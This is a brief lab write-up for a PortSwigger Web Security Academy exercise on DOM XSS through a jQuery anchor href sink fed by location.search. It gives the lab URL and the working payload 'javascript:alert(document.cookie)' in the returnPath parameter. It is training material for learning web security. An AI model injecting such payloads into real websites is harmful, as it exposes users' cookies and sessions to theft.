Port Swigger DOM XSS in jQuery anchor href attribu

DOM XSS in jQuery anchor href attribute sink using location.search source

Solution

Open website: https://0ac400610318386b80c4e9ac00cc0061.web-security-academy.net/feedback?returnPath=/

https://0ac400610318386b80c4e9ac00cc0061.web-security-academy.net/feedback?returnPath=/

Add payload to GET request

Payload: javascript:alert(document.cookie)
--
GET /feedback?returnPath=javascript:alert(document.cookie)

Click button "< Back"

https://0ac400610318386b80c4e9ac00cc0061.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)

Solved

Congratulations, you solved the lab!